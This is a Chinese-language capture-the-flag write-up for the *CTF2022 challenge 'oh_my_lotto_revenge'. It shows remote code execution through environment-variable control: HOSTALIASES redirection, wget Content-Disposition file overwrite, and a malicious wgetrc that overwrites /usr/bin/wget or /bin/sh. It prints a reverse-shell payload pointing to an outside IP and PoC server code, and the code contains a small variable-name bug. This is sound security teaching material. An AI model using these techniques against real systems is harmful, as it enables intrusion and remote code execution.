[*CTF2022]oh_my_lotto_revenge

Posted 2023-02-14 huamanggg

New

相对于oh_my_lotto，revenge进行了下面的更改

这么做，我们能走的就只有RCE了，而这里唯一能操作的一个地方就是这里，可以操作环境变量

os.environ[lotto_key] = lotto_value

这里有几个非预期解，先看看预期解

Intented writeup

这里可以操控环境变量，那么我们能做的事情就很多了，预期解是操控HOSTALIASES修改hosts

因为他的wget是通过域名下载的

os.system('wget --content-disposition -N lotto')

我们把伪造的hosts文件通过forecast路由传到服务器，然后修改环境变量把hosts指向/app/guess/forecast.txt

剩下的就是如何利用了，可以发现wget的参数是--content-disposition -N

对于这个参数的意义，我在谷歌找到了如下定义：他是可以由服务器端决定下载的文件，-N表示文件名不变进行覆盖

、

这样的话，我们就可以操控他下载的文件，去进行覆盖app.py

我查找了这个http头的语法

我们只需要在http头指定app.py即可把恶意的app.py覆盖掉源文件

这样的话我们就可以编写如下poc

app.py

import flask
import os

app = flask.Flask(__name__)
@app.route("/rce")
def rce():
    return str(os.popen('env').read())

if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=8080)

main.py

import flask
import os

app = flask.Flask(__name__)
@app.route("/")
def index():
    with open('app.py','rb') as f:
        res = f.read()
    r = flask.make_response(res)
    response.headers['Content-Type'] = 'text/plain'
    response.headers['Content-Disposition'] = 'attachment; filename=app.py'
    return response

if __name__ == "__main__":
    app.run(debug=True,host='0.0.0.0', port=8899)

在服务器启动main.py，然后上传伪造hosts文件

# hosts
lotto domain

然后在lotto页面修改环境变量

HOSTALIASES
/app/guess/forecast.txt

然后在服务器添加反代，把8899端口转发到80端口

可以发现app.py成功被覆盖

但是发现他还是原来的服务

是因为服务是gunicorn搭建起来的，他更新py文件以后不会实时更新，而gunicorn有一个pre-forked worker机制，当某个worker超时以后，就会让gunicorn重启该worker

官方文档

我们可以抓包进行爆破服务让他崩溃重启

崩溃后，成功拿到flag

预期解至此

Unintented writeup

非预期解，这里我只知道一直就是利用WGETRC，配合http_proxy和output_document，覆盖本地的wget应用，然后利用wget完成RCE

查官方文档可知，wget会找环境变量WGETRC，加载wgetrc文件

而具体利用wgetrc就是看这篇官方文档

这样的话，就是通过上传我们构造的wgetrc去进行攻击

这里注意了这几个配置项

# 把记录写到file里
output_document = file
		Set the output filename—the same as ‘-O file’.

# 设置HTTP代理
http_proxy = string
Use string as HTTP proxy, instead of the one specified in environment.

我在本机测试了一下，设置了http_proxy以后，wget下载的都是代理服务器的文件

通过这个代理服务器，我们可以通过修改代理服务器的东西去修改返回值，然后利用output_document进行覆盖

0x01

因为我们只能执行wget，所以我们直接索性覆盖wget

构造如下wgetrc文件

output_document = /usr/bin/wget
http_proxy = test.huamang.xyz
https_proxy = test.huamang.xyz

在代理服务器开一个80端口的web服务，写着反弹shell的命令

#!/bin/bash
bash -c "bash -i < /dev/tcp/10.211.55.4/8888 1<&0 2<&0"

把文件传上去，然后去lotto路由修改WGETRC的值为/app/guess/forecast.txt

然后触发wget命令，拿到flag

但是这个方法不够优雅，会覆盖掉wget，让其他选手没有体验感

0x02

WGETRC还有一个参数

use_askpass=/bin/xxx

通过这个参数可以直接执行二进制文件，但是wget下载的文件，是没有x权限的，无法执行

所以我们可以通过覆盖掉/bin/sh后（题目使用的是/usr/bin/），再利用这个参数去执行他

所以具体步骤是：

首先上传如下文件，覆盖掉可以执行文件

output_document = /bin/sh
http_proxy = test.huamang.xyz
https_proxy = test.huamang.xyz

然后上传use_askpass参数去执行命令

use_askpass=/bin/sh

成功RCE

总结

这里的预期解， 是想考察对于HOSTALIASES环境变量的理解，通过修改host，把域名指向攻击者服务器，进而下载恶意代码覆盖原文件

也考察了Gunicorn的pre-fork worker机制，可以通过大量访问使其崩溃，从而加载我们覆盖的恶意代码

这里的非预期解，是从wget的配置文件WGETRC去入手的，通过上传恶意构造的wgetrc文件，再修改环境变量去指定到这个配置文件，从而可以随意的修改wget的参数

这里很巧妙的发现有几个参数是：output_document、http_proxy、use_askpass，让我们可以控制wget的结果与去处甚至直接执行二进制文件，造成了漏洞的利用